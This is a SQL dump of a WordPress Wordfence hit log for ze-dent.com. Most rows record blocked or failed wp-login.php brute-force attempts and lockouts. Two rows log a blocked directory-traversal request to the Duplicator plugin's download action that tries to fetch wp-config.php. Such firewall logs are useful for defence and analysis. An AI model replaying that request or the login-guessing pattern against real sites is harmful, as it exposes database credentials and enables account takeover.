(4650, 0.000000, 1594677713.567535, 0x00000000000000000000ffffb955eef4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4651, 0.000000, 1594679369.792202, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4652, 1594679378.887854, 1594679378.861400, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4653, 1594679373.611622, 1594679373.545100, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4654, 0.000000, 1594679900.877679, 0x00000000000000000000ffff68f8934e, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4655, 1594681152.916187, 1594681152.865100, 0x00000000000000000000ffffadecc522, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php', NULL, 'Chrome', 'blocked:waf', 'Directory Traversal - wp-config.php', '{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(4656, 1594681152.378398, 1594681152.283300, 0x00000000000000000000ffffadecc522, 0, 403, 0, 0, 0, 'http://ze-dent.com/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Findex.php', NULL, 'Chrome', 'blocked:waf', 'Directory Traversal', '{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vaW5kZXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(4657, 0.000000, 1594682589.886309, 0x00000000000000000000ffff23e48f61, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://kiawahriverestates.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4658, 0.000000, 1594684287.420794, 0x00000000000000000000ffff2e65a873, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4659, 0.000000, 1594686882.808099, 0x00000000000000000000ffffb955bfc9, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4660, 0.000000, 1594689028.828753, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4661, 1594689039.978703, 1594689039.915000, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4662, 1594689034.316723, 1594689034.253400, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4663, 0.000000, 1594691938.548846, 0x00000000000000000000ffffab06c76c, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4664, 0.000000, 1594695304.893964, 0x00000000000000000000ffffb955be84, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4665, 0.000000, 1594700197.317295, 0x00000000000000000000ffff05bc3e93, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(4666, 0.000000, 1594700201.519211, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4667, 0.000000, 1594700305.313559, 0x00000000000000000000ffff4e2619cc, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4668, 0.000000, 1594700778.989854, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4669, 1594700797.068317, 1594700797.040500, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4670, 1594700792.232533, 1594700792.145800, 0x00000000000000000000ffff592327b4, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.90 Safari/537.36 2345Explorer/9.3.2.17331', 'blocked:wfsnrepeat', 'Blocked by Wordfence Security Network', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4671, 0.000000, 1594701531.407999, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4672, 0.000000, 1594701795.726649, 0x00000000000000000000ffff03173265, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4673, 0.000000, 1594702874.509798, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4674, 0.000000, 1594703330.576244, 0x00000000000000000000ffffa5e36f27, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4675, 0.000000, 1594703899.851546, 0x00000000000000000000ffffca1cfa42, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4676, 0.000000, 1594704198.853036, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4677, 0.000000, 1594704273.937365, 0x00000000000000000000ffffb955efc3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4678, 0.000000, 1594705649.238046, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4679, 0.000000, 1594706492.325784, 0x00000000000000000000ffffb4f4e953, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4680, 0.000000, 1594707117.035233, 0x00000000000000000000ffff05bc3e93, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(4681, 0.000000, 1594707121.028963, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4682, 0.000000, 1594708077.420657, 0x00000000000000000000ffffa5166703, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4683, 0.000000, 1594708611.218458, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4684, 0.000000, 1594710094.986704, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4685, 0.000000, 1594710812.553476, 0x00000000000000000000ffff2241f717, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://rjmotosport.com/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4686, 0.000000, 1594711590.451195, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4687, 0.000000, 1594712191.792767, 0x00000000000000000000ffff2e65a873, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4688, 0.000000, 1594713149.916130, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4689, 0.000000, 1594714780.446327, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4690, 0.000000, 1594715653.974269, 0x00000000000000000000ffff0de95719, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4691, 0.000000, 1594715705.626769, 0x00000000000000000000ffffb956a467, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4692, 0.000000, 1594716540.878880, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4693, 0.000000, 1594718048.765241, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', NULL),
(4694, 0.000000, 1594718615.178815, 0x00000000000000000000ffffa516fb79, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4695, 1594719527.223775, 1594719527.069100, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4696, 1594721091.827381, 1594721091.776900, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4697, 1594724081.908878, 1594724081.175700, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4698, 1594722620.790729, 1594722620.731200, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4699, 0.000000, 1594724642.607266, 0x00000000000000000000ffff40e300ea, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4700, 0.000000, 1594725106.622122, 0x00000000000000000000ffffb956a46f, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4701, 1594725564.583904, 1594725564.471500, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4702, 0.000000, 1594725978.761003, 0x00000000000000000000ffff334b902b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4703, 1594727033.923445, 1594727033.769500, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4704, 0.000000, 1594727142.066896, 0x00000000000000000000ffff23e48f61, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://vianneydrama.com/user/', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4705, 0.000000, 1594727976.810767, 0x00000000000000000000ffff8b639404, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL);
INSERT INTO `zdenl_wfhits` (`id`, `attackLogTime`, `ctime`, `IP`, `jsRun`, `statusCode`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`, `action`, `actionDescription`, `actionData`) VALUES
(4706, 1594728540.486760, 1594728540.386500, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4707, 1594730257.595603, 1594730257.548200, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4708, 0.000000, 1594731196.402725, 0x00000000000000000000ffffb2207c4a, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134', 'loginFailInvalidUsername', NULL, NULL),
(4709, 1594731715.893360, 1594731715.849800, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4710, 0.000000, 1594732548.840162, 0x00000000000000000000ffff335b7beb, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(4711, 1594733110.529333, 1594733110.469800, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4712, 0.000000, 1594733838.310133, 0x00000000000000000000ffff28459b5b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com//wp-login.php', 'http://www.ze-dent.com//wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4713, 0.000000, 1594734501.007910, 0x00000000000000000000ffffb956a46e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4714, 1594734630.134744, 1594734630.014300, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4715, 1594736183.648505, 1594736183.588500, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4716, 1594737652.738683, 1594737652.692000, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(4717, 0.000000, 1594739057.782856, 0x00000000000000000000ffff8b3b42cf, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4718, 1594739302.904433, 1594739302.832300, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
